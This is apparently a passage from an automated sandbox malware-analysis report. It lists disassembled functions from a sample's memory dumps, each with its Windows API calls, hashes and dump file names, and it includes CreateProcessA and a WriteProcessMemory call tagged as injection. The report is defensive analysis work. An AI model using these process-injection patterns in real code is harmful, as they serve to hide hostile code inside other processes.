Instruction Fuzzy Hash: 33014F75901208AFC708DF54D4918AABBB5EF69304B60C5AED92E4BB60DB30EA05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE3913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE3915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CE39170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CE39191

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e9359ed41a2787c8167fd20ed7079cd2169489487ae0818e396107e949335bbb
Instruction ID: 3308cb514639e06e491fbd22e9a68826c999b755c518050422ffcf674d6aa1f4
Opcode Fuzzy Hash: e9359ed41a2787c8167fd20ed7079cd2169489487ae0818e396107e949335bbb
Instruction Fuzzy Hash: 52413176900219DFCB04DF95D9858EEBBB4FF88314B21859ED816AB750D730BA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CE38E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CE38EAD
_memset.LIBCMT ref: 6CE38ED2

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: 3eb87df9c3377cf1f0910cc074f5c8711220a5a40eb595dfea045b312e8a7e4e
Instruction ID: 47107328d8c3f2f49539d00ef58c7813f2d069b60a925f79945b524a24dbdf34
Opcode Fuzzy Hash: 3eb87df9c3377cf1f0910cc074f5c8711220a5a40eb595dfea045b312e8a7e4e
Instruction Fuzzy Hash: FE517EB4A012199FC714CF58C890E9AB7B6FF49308F20959EE91A8BB81C731FD55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE469C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 45ec9b701079becf77e9d5a2955c90d7a324641558bead35032d4ab6db04017f
Instruction ID: 954e90d4187a2fee741ae5b601a72e8e1f2698acfdfa60ff0cc1b6c7adc52c88
Opcode Fuzzy Hash: 45ec9b701079becf77e9d5a2955c90d7a324641558bead35032d4ab6db04017f
Instruction Fuzzy Hash: F9416D756406199FDB00DFA8D880EAF77B9EF49354F208659E921DB780D730E941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3DFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE3DFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3E003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE3E02F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 1c018df5c48ac6275091d41cb4c66d2ed0a3d795f9ccb1284ed226c0151f2a55
Instruction ID: a0dc92ed8821e095a4af6d3609a35145fb8e9fabde3aa40fd405c376c60ccc3c
Opcode Fuzzy Hash: 1c018df5c48ac6275091d41cb4c66d2ed0a3d795f9ccb1284ed226c0151f2a55
Instruction Fuzzy Hash: 12414D72A0151ADFCB04DF98C8C0AAEB7B9FB49314B204669E525E7390C735AD42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CE3D949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CE3D96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE3D9CF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: f3e11f4b4ec5b410b2619d747c64a1a5224c9fb11f6990140a140525216cbae1
Instruction ID: 3ef9dd3387439f9bf1686049b855629254f26facfdbed694ed28f167a9566fe7
Opcode Fuzzy Hash: f3e11f4b4ec5b410b2619d747c64a1a5224c9fb11f6990140a140525216cbae1
Instruction Fuzzy Hash: AA219235201214EFEB01CF94C884FAB77B8EF8A704F205099E948DB344D7B1EA01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE4DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE4DBA2

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 9ecd59309bcfdcf2f093bba91cc35b9e24b98732ae346b93c3b080e3bcb380ac
Instruction ID: 58b73d44e91a9786cd93bf40af6632f579a6d2ce5d0d420de3d9827e7217f719
Opcode Fuzzy Hash: 9ecd59309bcfdcf2f093bba91cc35b9e24b98732ae346b93c3b080e3bcb380ac
Instruction Fuzzy Hash: FE11BF7A741205AFD700DF69D888F9ABBB8FF5A314F148299E908DB301D730A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07E50000 Relevance: 3.8, Strings: 3, Instructions: 95COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07E50077
(, xrefs: 07E5000C
TJcq, xrefs: 07E5008F

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: ($TJcq$Te^q
API String ID: 0-3248821021
Opcode ID: 68b2f1f333e779932455fea2a945bae8e48dafde5de4a3ad3658f9bbfe1e7289
Instruction ID: 05f5a0bbca0484d89c340f74bbfc3b92c949f689af85a1375699ed8c321400ae
Opcode Fuzzy Hash: 68b2f1f333e779932455fea2a945bae8e48dafde5de4a3ad3658f9bbfe1e7289
Instruction Fuzzy Hash: 6E31E4A060E3915FDB169BB4986876E7FF2AF87210F0504DFD481DF2A2C9395C0983A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4E2CE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

|l, xrefs: 6CE4E3B6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _malloc
String ID: |l
API String ID: 1579825452-2504203181
Opcode ID: f7334f1fc8d61baca8558813a7d5fd716cbe0d1e0dab51e358c08ef6a3aee4b8
Instruction ID: 0d4dfb01cebf128d3434d1aedfb5d02dcea8d4e627502f4ce7b644d65f15129a
Opcode Fuzzy Hash: f7334f1fc8d61baca8558813a7d5fd716cbe0d1e0dab51e358c08ef6a3aee4b8
Instruction Fuzzy Hash: A18191B1D097808FEB20DFA4998175AFBF0AB41708F34897DD2598BB90D7759848CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE3BE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CE3BE6D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: 032fd0db50924eef730e989a85ed211d3fd8d1fe52d005f85434c8694b2fe391
Instruction ID: 063681d0913b3e5dc5ade054ec14efc3a38d61a7f3aea30f367ae6655df0dce9
Opcode Fuzzy Hash: 032fd0db50924eef730e989a85ed211d3fd8d1fe52d005f85434c8694b2fe391
Instruction Fuzzy Hash: E771E370D04A6A5EDB118E6A8C40659FBB1AF4622CF38A35CD9AE97BD5C331E442CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6CE38C13,?,6CE38CD3,?,6CE38C13,00000000,?,?,6CE38C13,?,?), ref: 6CE38D73
LeaveCriticalSection.KERNEL32(?,?,?,6CE38CD3,?,6CE38C13,00000000,?,?,6CE38C13,?,?), ref: 6CE38D8C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: edae01dcb50d0d2733f38385e1ba8da045223dad1006ee5dad3fae26768dc8da
Instruction ID: 7ab716d3a27cc42ef86ed15a5f7c221f840b7ceae9c6e0808e03b3a82ae23b9a
Opcode Fuzzy Hash: edae01dcb50d0d2733f38385e1ba8da045223dad1006ee5dad3fae26768dc8da
Instruction Fuzzy Hash: DF21E975200109EFCB14DF89D890DAAB3BAFFC9214B24955AE91987350CB31EE15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07E5010C Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07E50156
TJcq, xrefs: 07E5016D

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 5e03b82c5725cb070879e0f061d10d36c8a7a7f69eb3cc0b911cc57c4b82c2a5
Instruction ID: 35d1d01cfca9d5221f93b1e12e68aad9bcfada3581a708e9d08adc75bd16fd52
Opcode Fuzzy Hash: 5e03b82c5725cb070879e0f061d10d36c8a7a7f69eb3cc0b911cc57c4b82c2a5
Instruction Fuzzy Hash: BC2149B0B053554FCB19AB78846466E7FB2AF86610F04059ED541DB3A1CE319C09C7E3

Uniqueness

Uniqueness Score: -1.00%

Function 07E50128 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07E50156
TJcq, xrefs: 07E5016D

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 5fb58958887b136f268e62b6b662480851d94a2ae93e358f8d59b4bd64389950
Instruction ID: ed30633ecc52418fb8f697731bc42a4c4f00dac21c0d4a415d4f706e1485584b
Opcode Fuzzy Hash: 5fb58958887b136f268e62b6b662480851d94a2ae93e358f8d59b4bd64389950
Instruction Fuzzy Hash: C411D570B0012A5BDB18AFA98458BBFBAB2FFC5610F50052DD5059B394CE319D0587E2

Uniqueness

Uniqueness Score: -1.00%

Function 07E50048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07E50077
TJcq, xrefs: 07E5008F

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: dc39172e0b8a2739c6dbad95e141e9f04fbfa89966999c469c4987503224afad
Instruction ID: 45c51d88a4bd6770f6f4e45f710311d0da0e3737ea64e5d06a3f1536b59481d6
Opcode Fuzzy Hash: dc39172e0b8a2739c6dbad95e141e9f04fbfa89966999c469c4987503224afad
Instruction Fuzzy Hash: 1E11E6B0B001265BDB18EBB9945877FBAE6FFC9600F50056DD506DB394CE315D0587E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6CE36890,?), ref: 6CE38BDD
LeaveCriticalSection.KERNEL32(?), ref: 6CE38C23

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: bcb54c9d200e71cd6c424fcfba41a21746ebe2ccc4ab903c5ff6a9403af66bcd
Instruction ID: 05a04db001f1c8ab12cdfe00d441f49161fbc6bfc775d5c43474363c1f7e8444
Opcode Fuzzy Hash: bcb54c9d200e71cd6c424fcfba41a21746ebe2ccc4ab903c5ff6a9403af66bcd
Instruction Fuzzy Hash: C401B8B2305114AFC710DFA8D88099AF3B8FB88204720826AE909C7700DB32EE54CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 07E66D4D Relevance: 1.7, APIs: 1, Instructions: 230processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E66F6C

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e41fc72b4f9e991a5af6692d767b19f8ea7d4784141b26aee71ae7c60434cda7
Instruction ID: dc883723f6e6610e7ede413d2ac8b6689363faaa68e4c0b2347da5e32d3d6c00
Opcode Fuzzy Hash: e41fc72b4f9e991a5af6692d767b19f8ea7d4784141b26aee71ae7c60434cda7
Instruction Fuzzy Hash: 83919BB1D1121A9FDB10DFA8C8897EDBBF1FF48358F149129E814E7280DB759891CB82

Uniqueness

Uniqueness Score: -1.00%

Function 07E66D58 Relevance: 1.7, APIs: 1, Instructions: 225processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E66F6C

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e765d5b59cb13cf1e6075bea51c6448d9e090353954ca6b9c476a49b7261bc97
Instruction ID: d7bcda060f834b7c95f59e65a47d7bc6dc568a0ab086695e0e8c4f2ee1bea99a
Opcode Fuzzy Hash: e765d5b59cb13cf1e6075bea51c6448d9e090353954ca6b9c476a49b7261bc97
Instruction Fuzzy Hash: F1919CB1D1121A9FCB10CFA8C8897EDBBF1FF48358F149129E855E7280DB759891CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CE37140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6CE52820: _malloc.LIBCMT ref: 6CE52871

std::tr1::_Xweak.LIBCPMT ref: 6CE371D2

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: ee770920eb46f90b562704a0b8b81338bca787f6ba1707f6ad7a92a366a0ae09
Instruction ID: 8fbfc09e50666aaf4e602c8ca3ae6d9e1e93c952e34ad567effac1463bd43d33
Opcode Fuzzy Hash: ee770920eb46f90b562704a0b8b81338bca787f6ba1707f6ad7a92a366a0ae09
Instruction Fuzzy Hash: 3D3190B2A0524ADFCB10CFA9C980AABB7F5FF48208B20961DE81597B40D331F905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07E69060 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 07E69100

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e31bb62bbb8cb80f5fe8d07af3330b4a91c2e64e1e98d35ae0e2bc1cfc3b2fb9
Instruction ID: 347151699151b239bbcf06c511fe955bacfc88f8824133a3c62460c554fd8a60
Opcode Fuzzy Hash: e31bb62bbb8cb80f5fe8d07af3330b4a91c2e64e1e98d35ae0e2bc1cfc3b2fb9
Instruction Fuzzy Hash: 6621BFB1800348CFCB10EF99C448ADEBBF5FF48324F10855AE568A7252C739A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07E67338 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E673CD

Memory Dump Source

